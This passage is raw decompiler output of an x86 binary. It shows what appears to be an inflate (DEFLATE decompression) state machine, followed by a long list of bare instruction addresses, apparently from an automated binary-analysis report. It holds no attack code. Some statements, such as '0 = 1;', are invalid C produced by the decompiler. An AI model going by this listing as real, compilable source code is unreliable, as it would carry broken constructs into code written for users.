                                                                                    													__eax = __esi[0x26e8] - __edi;
                                                                                    													__eflags = __eax;
                                                                                    												} else {
                                                                                    													__ecx = __ecx - __edi;
                                                                                    													__eax = __ecx - __edi - 1;
                                                                                    												}
                                                                                    												__edx = __esi[0x26e8];
                                                                                    												__eflags = __edi - __edx;
                                                                                    												 *(__ebp - 8) = __edx;
                                                                                    												if(__edi == __edx) {
                                                                                    													__edx =  &(__esi[0x6e8]);
                                                                                    													__eflags = __ecx - __edx;
                                                                                    													if(__ecx != __edx) {
                                                                                    														__edi = __edx;
                                                                                    														__eflags = __edi - __ecx;
                                                                                    														 *(__ebp - 0x30) = __edi;
                                                                                    														if(__edi >= __ecx) {
                                                                                    															__eax =  *(__ebp - 8);
                                                                                    															__eax =  *(__ebp - 8) - __edi;
                                                                                    															__eflags = __eax;
                                                                                    														} else {
                                                                                    															__ecx = __ecx - __edi;
                                                                                    															__eax = __ecx;
                                                                                    														}
                                                                                    													}
                                                                                    												}
                                                                                    												__eflags = __eax;
                                                                                    												if(__eax == 0) {
                                                                                    													goto L183;
                                                                                    												} else {
                                                                                    													goto L172;
                                                                                    												}
                                                                                    											}
                                                                                    											L158:
                                                                                    											__eax = __esi[0x26e9];
                                                                                    											__edx =  &(__esi[0x6e8]);
                                                                                    											__eflags = __eax - __edx;
                                                                                    											if(__eax == __edx) {
                                                                                    												goto L163;
                                                                                    											}
                                                                                    											L159:
                                                                                    											__edi = __edx;
                                                                                    											__eflags = __edi - __eax;
                                                                                    											if(__edi >= __eax) {
                                                                                    												__ecx = __ecx - __edi;
                                                                                    												__eflags = __ecx;
                                                                                    												__eax = __ecx;
                                                                                    											} else {
                                                                                    												__eax = __eax - __edi;
                                                                                    												__eax = __eax - 1;
                                                                                    											}
                                                                                    											__eflags = __eax;
                                                                                    											if(__eax != 0) {
                                                                                    												goto L172;
                                                                                    											} else {
                                                                                    												goto L163;
                                                                                    											}
                                                                                    										case 7:
                                                                                    											L173:
                                                                                    											__eflags = __ebx - 7;
                                                                                    											if(__ebx > 7) {
                                                                                    												__ebx = __ebx - 8;
                                                                                    												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
                                                                                    												_t380 = __ebp - 0x38;
                                                                                    												 *_t380 =  *(__ebp - 0x38) - 1;
                                                                                    												__eflags =  *_t380;
                                                                                    											}
                                                                                    											goto L175;
                                                                                    										case 8:
                                                                                    											L4:
                                                                                    											while(_t425 < 3) {
                                                                                    												if( *(_t448 - 0x34) == 0) {
                                                                                    													goto L182;
                                                                                    												} else {
                                                                                    													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
                                                                                    													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
                                                                                    													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
                                                                                    													_t425 = _t425 + 8;
                                                                                    													continue;
                                                                                    												}
                                                                                    											}
                                                                                    											_t425 = _t425 - 3;
                                                                                    											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
                                                                                    											_t406 =  *(_t448 - 0x40) & 0x00000007;
                                                                                    											asm("sbb ecx, ecx");
                                                                                    											_t408 = _t406 >> 1;
                                                                                    											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
                                                                                    											if(_t408 == 0) {
                                                                                    												L24:
                                                                                    												 *_t446 = 9;
                                                                                    												_t436 = _t425 & 0x00000007;
                                                                                    												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
                                                                                    												_t425 = _t425 - _t436;
                                                                                    												goto L180;
                                                                                    											}
                                                                                    											L6:
                                                                                    											_t411 = _t408 - 1;
                                                                                    											if(_t411 == 0) {
                                                                                    												L13:
                                                                                    												__eflags =  *0x42dbb8;
                                                                                    												if( *0x42dbb8 != 0) {
                                                                                    													L22:
                                                                                    													_t412 =  *0x40942c; // 0x9
                                                                                    													_t446[4] = _t412;
                                                                                    													_t413 =  *0x409430; // 0x5
                                                                                    													_t446[4] = _t413;
                                                                                    													_t414 =  *0x42ca34; // 0x0
                                                                                    													_t446[5] = _t414;
                                                                                    													_t415 =  *0x42ca30; // 0x0
                                                                                    													_t446[6] = _t415;
                                                                                    													L23:
                                                                                    													 *_t446 =  *_t446 & 0x00000000;
                                                                                    													goto L180;
                                                                                    												} else {
                                                                                    													_t26 = _t448 - 8;
                                                                                    													 *_t26 =  *(_t448 - 8) & 0x00000000;
                                                                                    													__eflags =  *_t26;
                                                                                    													_t416 = 0x42ca38;
                                                                                    													goto L15;
                                                                                    													L20:
                                                                                    													 *_t416 = _t438;
                                                                                    													_t416 = _t416 + 4;
                                                                                    													__eflags = _t416 - 0x42ceb8;
                                                                                    													if(_t416 < 0x42ceb8) {
                                                                                    														L15:
                                                                                    														__eflags = _t416 - 0x42cc74;
                                                                                    														_t438 = 8;
                                                                                    														if(_t416 > 0x42cc74) {
                                                                                    															__eflags = _t416 - 0x42ce38;
                                                                                    															if(_t416 >= 0x42ce38) {
                                                                                    																__eflags = _t416 - 0x42ce98;
                                                                                    																if(_t416 < 0x42ce98) {
                                                                                    																	_t438 = 7;
                                                                                    																}
                                                                                    															} else {
                                                                                    																_t438 = 9;
                                                                                    															}
                                                                                    														}
                                                                                    														goto L20;
                                                                                    													} else {
                                                                                    														E00406B2B(0x42ca38, 0x120, 0x101, 0x4073fc, 0x40743c, 0x42ca34, 0x40942c, 0x42d338, _t448 - 8);
                                                                                    														_push(0x1e);
                                                                                    														_pop(_t440);
                                                                                    														_push(5);
                                                                                    														_pop(_t419);
                                                                                    														memset(0x42ca38, _t419, _t440 << 2);
                                                                                    														_t450 = _t450 + 0xc;
                                                                                    														_t442 = 0x42ca38 + _t440;
                                                                                    														E00406B2B(0x42ca38, 0x1e, 0, 0x40747c, 0x4074b8, 0x42ca30, 0x409430, 0x42d338, _t448 - 8);
                                                                                    														 *0x42dbb8 =  *0x42dbb8 + 1;
                                                                                    														__eflags =  *0x42dbb8;
                                                                                    														goto L22;
                                                                                    													}
                                                                                    												}
                                                                                    											}
                                                                                    											L7:
                                                                                    											_t423 = _t411 - 1;
                                                                                    											if(_t423 == 0) {
                                                                                    												 *_t446 = 0xb;
                                                                                    												goto L180;
                                                                                    											}
                                                                                    											L8:
                                                                                    											if(_t423 != 1) {
                                                                                    												goto L180;
                                                                                    											}
                                                                                    											goto L9;
                                                                                    										case 9:
                                                                                    											while(1) {
                                                                                    												L27:
                                                                                    												__eflags = __ebx - 0x10;
                                                                                    												if(__ebx >= 0x10) {
                                                                                    													break;
                                                                                    												}
                                                                                    												L25:
                                                                                    												__eflags =  *(__ebp - 0x34);
                                                                                    												if( *(__ebp - 0x34) == 0) {
                                                                                    													goto L182;
                                                                                    												}
                                                                                    												L26:
                                                                                    												__eax =  *(__ebp - 0x38);
                                                                                    												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                    												__ecx = __ebx;
                                                                                    												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                    												__ebx = __ebx + 8;
                                                                                    												__eflags = __ebx;
                                                                                    											}
                                                                                    											L28:
                                                                                    											__eax =  *(__ebp - 0x40);
                                                                                    											__ebx = 0;
                                                                                    											__eax =  *(__ebp - 0x40) & 0x0000ffff;
                                                                                    											 *(__ebp - 0x40) = 0;
                                                                                    											__eflags = __eax;
                                                                                    											__esi[1] = __eax;
                                                                                    											if(__eax == 0) {
                                                                                    												goto L53;
                                                                                    											}
                                                                                    											L29:
                                                                                    											_push(0xa);
                                                                                    											_pop(__eax);
                                                                                    											goto L54;
                                                                                    										case 0xa:
                                                                                    											L30:
                                                                                    											__eflags =  *(__ebp - 0x34);
                                                                                    											if( *(__ebp - 0x34) == 0) {
                                                                                    												goto L182;
                                                                                    											}
                                                                                    											L31:
                                                                                    											__eax =  *(__ebp - 0x2c);
                                                                                    											__eflags = __eax;
                                                                                    											if(__eax != 0) {
                                                                                    												L48:
                                                                                    												__eflags = __eax -  *(__ebp - 0x34);
                                                                                    												if(__eax >=  *(__ebp - 0x34)) {
                                                                                    													__eax =  *(__ebp - 0x34);
                                                                                    												}
                                                                                    												__ecx = __esi[1];
                                                                                    												__eflags = __ecx - __eax;
                                                                                    												__edi = __ecx;
                                                                                    												if(__ecx >= __eax) {
                                                                                    													__edi = __eax;
                                                                                    												}
                                                                                    												__eax = E0040585F( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
                                                                                    												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
                                                                                    												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
                                                                                    												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
                                                                                    												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
                                                                                    												_t80 =  &(__esi[1]);
                                                                                    												 *_t80 = __esi[1] - __edi;
                                                                                    												__eflags =  *_t80;
                                                                                    												if( *_t80 == 0) {
                                                                                    													L53:
                                                                                    													__eax = __esi[0x145];
                                                                                    													L54:
                                                                                    													 *__esi = __eax;
                                                                                    												}
                                                                                    												goto L180;
                                                                                    											}
                                                                                    											L32:
                                                                                    											__ecx = __esi[0x26e8];
                                                                                    											__edx =  *(__ebp - 0x30);
                                                                                    											__eflags = __edx - __ecx;
                                                                                    											if(__edx != __ecx) {
                                                                                    												L38:
                                                                                    												__esi[0x26ea] = __edx;
                                                                                    												__eax = E00406AC3( *((intOrPtr*)(__ebp + 8)));
                                                                                    												__edx = __esi[0x26ea];
                                                                                    												__ecx = __esi[0x26e9];
                                                                                    												__eflags = __edx - __ecx;
                                                                                    												 *(__ebp - 0x30) = __edx;
                                                                                    												if(__edx >= __ecx) {
                                                                                    													__eax = __esi[0x26e8];
                                                                                    													__eax = __esi[0x26e8] - __edx;
                                                                                    													__eflags = __eax;
                                                                                    												} else {
                                                                                    													__ecx = __ecx - __edx;
                                                                                    													__eax = __ecx - __edx - 1;
                                                                                    												}
                                                                                    												__edi = __esi[0x26e8];
                                                                                    												 *(__ebp - 0x2c) = __eax;
                                                                                    												__eflags = __edx - __edi;
                                                                                    												if(__edx == __edi) {
                                                                                    													__edx =  &(__esi[0x6e8]);
                                                                                    													__eflags = __edx - __ecx;
                                                                                    													if(__eflags != 0) {
                                                                                    														 *(__ebp - 0x30) = __edx;
                                                                                    														if(__eflags >= 0) {
                                                                                    															__edi = __edi - __edx;
                                                                                    															__eflags = __edi;
                                                                                    															__eax = __edi;
                                                                                    														} else {
                                                                                    															__ecx = __ecx - __edx;
                                                                                    															__eax = __ecx;
                                                                                    														}
                                                                                    														 *(__ebp - 0x2c) = __eax;
                                                                                    													}
                                                                                    												}
                                                                                    												__eflags = __eax;
                                                                                    												if(__eax == 0) {
                                                                                    													goto L183;
                                                                                    												} else {
                                                                                    													goto L48;
                                                                                    												}
                                                                                    											}
                                                                                    											L33:
                                                                                    											__eax = __esi[0x26e9];
                                                                                    											__edi =  &(__esi[0x6e8]);
                                                                                    											__eflags = __eax - __edi;
                                                                                    											if(__eax == __edi) {
                                                                                    												goto L38;
                                                                                    											}
                                                                                    											L34:
                                                                                    											__edx = __edi;
                                                                                    											__eflags = __edx - __eax;
                                                                                    											 *(__ebp - 0x30) = __edx;
                                                                                    											if(__edx >= __eax) {
                                                                                    												__ecx = __ecx - __edx;
                                                                                    												__eflags = __ecx;
                                                                                    												__eax = __ecx;
                                                                                    											} else {
                                                                                    												__eax = __eax - __edx;
                                                                                    												__eax = __eax - 1;
                                                                                    											}
                                                                                    											__eflags = __eax;
                                                                                    											 *(__ebp - 0x2c) = __eax;
                                                                                    											if(__eax != 0) {
                                                                                    												goto L48;
                                                                                    											} else {
                                                                                    												goto L38;
                                                                                    											}
                                                                                    										case 0xb:
                                                                                    											goto L56;
                                                                                    										case 0xc:
                                                                                    											L60:
                                                                                    											__esi[1] = __esi[1] >> 0xa;
                                                                                    											__eax = (__esi[1] >> 0xa) + 4;
                                                                                    											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                                                    												goto L68;
                                                                                    											}
                                                                                    											goto L61;
                                                                                    										case 0xd:
                                                                                    											while(1) {
                                                                                    												L93:
                                                                                    												__eax = __esi[1];
                                                                                    												__ecx = __esi[2];
                                                                                    												__edx = __eax;
                                                                                    												__eax = __eax & 0x0000001f;
                                                                                    												__edx = __edx >> 5;
                                                                                    												__eax = __edx + __eax + 0x102;
                                                                                    												__eflags = __esi[2] - __eax;
                                                                                    												if(__esi[2] >= __eax) {
                                                                                    													break;
                                                                                    												}
                                                                                    												L73:
                                                                                    												__eax = __esi[0x143];
                                                                                    												while(1) {
                                                                                    													L76:
                                                                                    													__eflags = __ebx - __eax;
                                                                                    													if(__ebx >= __eax) {
                                                                                    														break;
                                                                                    													}
                                                                                    													L74:
                                                                                    													__eflags =  *(__ebp - 0x34);
                                                                                    													if( *(__ebp - 0x34) == 0) {
                                                                                    														goto L182;
                                                                                    													}
                                                                                    													L75:
                                                                                    													__ecx =  *(__ebp - 0x38);
                                                                                    													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                    													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                    													__ecx = __ebx;
                                                                                    													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                    													__ebx = __ebx + 8;
                                                                                    													__eflags = __ebx;
                                                                                    												}
                                                                                    												L77:
                                                                                    												__eax =  *(0x409408 + __eax * 2) & 0x0000ffff;
                                                                                    												__eax = __eax &  *(__ebp - 0x40);
                                                                                    												__ecx = __esi[0x144];
                                                                                    												__eax = __esi[0x144] + __eax * 4;
                                                                                    												__edx =  *(__eax + 1) & 0x000000ff;
                                                                                    												__eax =  *(__eax + 2) & 0x0000ffff;
                                                                                    												__eflags = __eax - 0x10;
                                                                                    												 *(__ebp - 0x14) = __eax;
                                                                                    												if(__eax >= 0x10) {
                                                                                    													L79:
                                                                                    													__eflags = __eax - 0x12;
                                                                                    													if(__eax != 0x12) {
                                                                                    														__eax = __eax + 0xfffffff2;
                                                                                    														 *(__ebp - 8) = 3;
                                                                                    													} else {
                                                                                    														_push(7);
                                                                                    														 *(__ebp - 8) = 0xb;
                                                                                    														_pop(__eax);
                                                                                    													}
                                                                                    													while(1) {
                                                                                    														L84:
                                                                                    														__ecx = __eax + __edx;
                                                                                    														__eflags = __ebx - __eax + __edx;
                                                                                    														if(__ebx >= __eax + __edx) {
                                                                                    															break;
                                                                                    														}
                                                                                    														L82:
                                                                                    														__eflags =  *(__ebp - 0x34);
                                                                                    														if( *(__ebp - 0x34) == 0) {
                                                                                    															goto L182;
                                                                                    														}
                                                                                    														L83:
                                                                                    														__ecx =  *(__ebp - 0x38);
                                                                                    														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                    														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                    														__ecx = __ebx;
                                                                                    														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                    														__ebx = __ebx + 8;
                                                                                    														__eflags = __ebx;
                                                                                    													}
                                                                                    													L85:
                                                                                    													__ecx = __edx;
                                                                                    													__ebx = __ebx - __edx;
                                                                                    													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                    													 *(0x409408 + __eax * 2) & 0x0000ffff =  *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                                    													__edx =  *(__ebp - 8);
                                                                                    													__ebx = __ebx - __eax;
                                                                                    													__edx =  *(__ebp - 8) + ( *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                    													__ecx = __eax;
                                                                                    													__eax = __esi[1];
                                                                                    													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                    													__ecx = __esi[2];
                                                                                    													__eax = __eax >> 5;
                                                                                    													__edi = __eax >> 0x00000005 & 0x0000001f;
                                                                                    													__eax = __eax & 0x0000001f;
                                                                                    													__eax = __edi + __eax + 0x102;
                                                                                    													__edi = __edx + __ecx;
                                                                                    													__eflags = __edx + __ecx - __eax;
                                                                                    													if(__edx + __ecx > __eax) {
                                                                                    														goto L9;
                                                                                    													}
                                                                                    													L86:
                                                                                    													__eflags =  *(__ebp - 0x14) - 0x10;
                                                                                    													if( *(__ebp - 0x14) != 0x10) {
                                                                                    														L89:
                                                                                    														__edi = 0;
                                                                                    														__eflags = 0;
                                                                                    														L90:
                                                                                    														__eax = __esi + 0xc + __ecx * 4;
                                                                                    														do {
                                                                                    															L91:
                                                                                    															 *__eax = __edi;
                                                                                    															__ecx = __ecx + 1;
                                                                                    															__eax = __eax + 4;
                                                                                    															__edx = __edx - 1;
                                                                                    															__eflags = __edx;
                                                                                    														} while (__edx != 0);
                                                                                    														__esi[2] = __ecx;
                                                                                    														continue;
                                                                                    													}
                                                                                    													L87:
                                                                                    													__eflags = __ecx - 1;
                                                                                    													if(__ecx < 1) {
                                                                                    														goto L9;
                                                                                    													}
                                                                                    													L88:
                                                                                    													__edi =  *(__esi + 8 + __ecx * 4);
                                                                                    													goto L90;
                                                                                    												}
                                                                                    												L78:
                                                                                    												__ecx = __edx;
                                                                                    												__ebx = __ebx - __edx;
                                                                                    												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                    												__ecx = __esi[2];
                                                                                    												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                                                                                    												__esi[2] = __esi[2] + 1;
                                                                                    											}
                                                                                    											L94:
                                                                                    											__eax = __esi[1];
                                                                                    											__esi[0x144] = __esi[0x144] & 0x00000000;
                                                                                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                                                                                    											__edi = __eax;
                                                                                    											__eax = __eax >> 5;
                                                                                    											__edi = __edi & 0x0000001f;
                                                                                    											__ecx = 0x101;
                                                                                    											__eax = __eax & 0x0000001f;
                                                                                    											__edi = __edi + 0x101;
                                                                                    											__eax = __eax + 1;
                                                                                    											__edx = __ebp - 0xc;
                                                                                    											 *(__ebp - 0x14) = __eax;
                                                                                    											 &(__esi[0x148]) = __ebp - 4;
                                                                                    											 *(__ebp - 4) = 9;
                                                                                    											__ebp - 0x18 =  &(__esi[3]);
                                                                                    											 *(__ebp - 0x10) = 6;
                                                                                    											__eax = E00406B2B( &(__esi[3]), __edi, 0x101, 0x4073fc, 0x40743c, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                                                                                    											__eflags =  *(__ebp - 4);
                                                                                    											if( *(__ebp - 4) == 0) {
                                                                                    												__eax = __eax | 0xffffffff;
                                                                                    												__eflags = __eax;
                                                                                    											}
                                                                                    											__eflags = __eax;
                                                                                    											if(__eax != 0) {
                                                                                    												goto L9;
                                                                                    											} else {
                                                                                    												L97:
                                                                                    												__ebp - 0xc =  &(__esi[0x148]);
                                                                                    												__ebp - 0x10 = __ebp - 0x1c;
                                                                                    												__eax = __esi + 0xc + __edi * 4;
                                                                                    												__eax = E00406B2B(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x40747c, 0x4074b8, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                                                                                    												__eflags = __eax;
                                                                                    												if(__eax != 0) {
                                                                                    													goto L9;
                                                                                    												}
                                                                                    												L98:
                                                                                    												__eax =  *(__ebp - 0x10);
                                                                                    												__eflags =  *(__ebp - 0x10);
                                                                                    												if( *(__ebp - 0x10) != 0) {
                                                                                    													L100:
                                                                                    													__cl =  *(__ebp - 4);
                                                                                    													 *__esi =  *__esi & 0x00000000;
                                                                                    													__eflags =  *__esi;
                                                                                    													__esi[4] = __al;
                                                                                    													__eax =  *(__ebp - 0x18);
                                                                                    													__esi[5] =  *(__ebp - 0x18);
                                                                                    													__eax =  *(__ebp - 0x1c);
                                                                                    													__esi[4] = __cl;
                                                                                    													__esi[6] =  *(__ebp - 0x1c);
                                                                                    													goto L101;
                                                                                    												}
                                                                                    												L99:
                                                                                    												__eflags = __edi - 0x101;
                                                                                    												if(__edi > 0x101) {
                                                                                    													goto L9;
                                                                                    												}
                                                                                    												goto L100;
                                                                                    											}
                                                                                    										case 0xe:
                                                                                    											goto L9;
                                                                                    										case 0xf:
                                                                                    											L175:
                                                                                    											__eax =  *(__ebp - 0x30);
                                                                                    											__esi[0x26ea] =  *(__ebp - 0x30);
                                                                                    											__eax = E00406AC3( *((intOrPtr*)(__ebp + 8)));
                                                                                    											__ecx = __esi[0x26ea];
                                                                                    											__edx = __esi[0x26e9];
                                                                                    											__eflags = __ecx - __edx;
                                                                                    											 *(__ebp - 0x30) = __ecx;
                                                                                    											if(__ecx >= __edx) {
                                                                                    												__eax = __esi[0x26e8];
                                                                                    												__eax = __esi[0x26e8] - __ecx;
                                                                                    												__eflags = __eax;
                                                                                    											} else {
                                                                                    												__edx = __edx - __ecx;
                                                                                    												__eax = __edx - __ecx - 1;
                                                                                    											}
                                                                                    											__eflags = __ecx - __edx;
                                                                                    											 *(__ebp - 0x2c) = __eax;
                                                                                    											if(__ecx != __edx) {
                                                                                    												L183:
                                                                                    												__edi = 0;
                                                                                    												goto L10;
                                                                                    											} else {
                                                                                    												L179:
                                                                                    												__eax = __esi[0x145];
                                                                                    												__eflags = __eax - 8;
                                                                                    												 *__esi = __eax;
                                                                                    												if(__eax != 8) {
                                                                                    													L184:
                                                                                    													0 = 1;
                                                                                    													goto L10;
                                                                                    												}
                                                                                    												goto L180;
                                                                                    											}
                                                                                    									}
                                                                                    								}
                                                                                    								L181:
                                                                                    								goto L9;
                                                                                    							}
                                                                                    							L70:
                                                                                    							if( *__edi == __eax) {
                                                                                    								goto L72;
                                                                                    							}
                                                                                    							L71:
                                                                                    							__esi[2] = __esi[2] & __eax;
                                                                                    							 *__esi = 0xd;
                                                                                    							goto L93;
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    				L182:
                                                                                    				_t443 = 0;
                                                                                    				_t446[0x147] =  *(_t448 - 0x40);
                                                                                    				_t446[0x146] = _t425;
                                                                                    				( *(_t448 + 8))[1] = 0;
                                                                                    				goto L11;
                                                                                    			}









                                                                                    0x00406354
                                                                                    0x00406354
                                                                                    0x00406354
                                                                                    0x00406354
                                                                                    0x00406354
                                                                                    0x00406358
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040635e
                                                                                    0x0040635e
                                                                                    0x00406361
                                                                                    0x00406364
                                                                                    0x00406369
                                                                                    0x0040636b
                                                                                    0x0040636e
                                                                                    0x00406371
                                                                                    0x00406374
                                                                                    0x00406374
                                                                                    0x00406377
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406379
                                                                                    0x00406379
                                                                                    0x0040637c
                                                                                    0x00406381
                                                                                    0x00406383
                                                                                    0x00406386
                                                                                    0x0040638c
                                                                                    0x004060eb
                                                                                    0x004060eb
                                                                                    0x004060ee
                                                                                    0x004060f4
                                                                                    0x004060fa
                                                                                    0x00406103
                                                                                    0x00406109
                                                                                    0x0040610c
                                                                                    0x00406113
                                                                                    0x00406118
                                                                                    0x0040611e
                                                                                    0x00406129
                                                                                    0x00406129
                                                                                    0x00406392
                                                                                    0x00406392
                                                                                    0x0040639c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004063a2
                                                                                    0x004063a2
                                                                                    0x004063a6
                                                                                    0x004063a9
                                                                                    0x004063a9
                                                                                    0x004063ad
                                                                                    0x004063b3
                                                                                    0x004063b3
                                                                                    0x004063b6
                                                                                    0x004063b9
                                                                                    0x004063bf
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004063c1
                                                                                    0x004063e3
                                                                                    0x004063e3
                                                                                    0x004063e6
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004063c3
                                                                                    0x004063c7
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004063cd
                                                                                    0x004063cd
                                                                                    0x004063d0
                                                                                    0x004063d3
                                                                                    0x004063d8
                                                                                    0x004063da
                                                                                    0x004063dd
                                                                                    0x004063e0
                                                                                    0x004063e0
                                                                                    0x004063e8
                                                                                    0x004063e8
                                                                                    0x004063ee
                                                                                    0x004063f1
                                                                                    0x004063f4
                                                                                    0x004063f4
                                                                                    0x004063fb
                                                                                    0x004063ff
                                                                                    0x00406403
                                                                                    0x00406406
                                                                                    0x00406409
                                                                                    0x0040640f
                                                                                    0x00406414
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406416
                                                                                    0x0040642a
                                                                                    0x0040642a
                                                                                    0x0040642e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406418
                                                                                    0x0040641b
                                                                                    0x0040641b
                                                                                    0x00406422
                                                                                    0x00406427
                                                                                    0x00406427
                                                                                    0x00406427
                                                                                    0x00406430
                                                                                    0x00406430
                                                                                    0x00406433
                                                                                    0x00406441
                                                                                    0x00406447
                                                                                    0x0040644c
                                                                                    0x00406452
                                                                                    0x00406458
                                                                                    0x0040645e
                                                                                    0x00406465
                                                                                    0x00406479
                                                                                    0x00406479
                                                                                    0x00406a48
                                                                                    0x00406a48
                                                                                    0x00406a48
                                                                                    0x00406a4d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406085
                                                                                    0x00406085
                                                                                    0x00000000
                                                                                    0x00406680
                                                                                    0x00406680
                                                                                    0x00406684
                                                                                    0x00406687
                                                                                    0x0040668a
                                                                                    0x0040668d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406693
                                                                                    0x00406693
                                                                                    0x004066b8
                                                                                    0x004066b8
                                                                                    0x004066b8
                                                                                    0x004066ba
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406698
                                                                                    0x00406698
                                                                                    0x0040669c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004066a2
                                                                                    0x004066a2
                                                                                    0x004066a5
                                                                                    0x004066a8
                                                                                    0x004066ab
                                                                                    0x004066ad
                                                                                    0x004066af
                                                                                    0x004066b2
                                                                                    0x004066b5
                                                                                    0x004066b5
                                                                                    0x004066b5
                                                                                    0x004066bc
                                                                                    0x004066bc
                                                                                    0x004066c4
                                                                                    0x004066c7
                                                                                    0x004066ca
                                                                                    0x004066cd
                                                                                    0x004066d1
                                                                                    0x004066d4
                                                                                    0x004066d6
                                                                                    0x004066d9
                                                                                    0x004066db
                                                                                    0x004066ef
                                                                                    0x004066ef
                                                                                    0x004066f2
                                                                                    0x0040670c
                                                                                    0x0040670c
                                                                                    0x0040670f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406715
                                                                                    0x00406715
                                                                                    0x00406718
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040671e
                                                                                    0x0040671e
                                                                                    0x00000000
                                                                                    0x0040671e
                                                                                    0x004066f4
                                                                                    0x004066f7
                                                                                    0x004066fe
                                                                                    0x00406701
                                                                                    0x00000000
                                                                                    0x00406701
                                                                                    0x004066dd
                                                                                    0x004066e1
                                                                                    0x004066e4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406729
                                                                                    0x00406729
                                                                                    0x0040674e
                                                                                    0x0040674e
                                                                                    0x0040674e
                                                                                    0x00406750
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040672e
                                                                                    0x0040672e
                                                                                    0x00406732
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406738
                                                                                    0x00406738
                                                                                    0x0040673b
                                                                                    0x0040673e
                                                                                    0x00406741
                                                                                    0x00406743
                                                                                    0x00406745
                                                                                    0x00406748
                                                                                    0x0040674b
                                                                                    0x0040674b
                                                                                    0x0040674b
                                                                                    0x00406752
                                                                                    0x0040675a
                                                                                    0x0040675d
                                                                                    0x00406760
                                                                                    0x00406762
                                                                                    0x00406765
                                                                                    0x00406765
                                                                                    0x00406767
                                                                                    0x0040676b
                                                                                    0x0040676e
                                                                                    0x00406771
                                                                                    0x00406774
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040677a
                                                                                    0x0040677a
                                                                                    0x0040679f
                                                                                    0x0040679f
                                                                                    0x0040679f
                                                                                    0x004067a1
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040677f
                                                                                    0x0040677f
                                                                                    0x00406783
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406789
                                                                                    0x00406789
                                                                                    0x0040678c
                                                                                    0x0040678f
                                                                                    0x00406792
                                                                                    0x00406794
                                                                                    0x00406796
                                                                                    0x00406799
                                                                                    0x0040679c
                                                                                    0x0040679c
                                                                                    0x0040679c
                                                                                    0x004067a3
                                                                                    0x004067a3
                                                                                    0x004067ab
                                                                                    0x004067ae
                                                                                    0x004067b1
                                                                                    0x004067b4
                                                                                    0x004067b8
                                                                                    0x004067bb
                                                                                    0x004067bd
                                                                                    0x004067c0
                                                                                    0x004067c3
                                                                                    0x004067dd
                                                                                    0x004067dd
                                                                                    0x004067e0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004067e6
                                                                                    0x004067e6
                                                                                    0x004067e9
                                                                                    0x004067f0
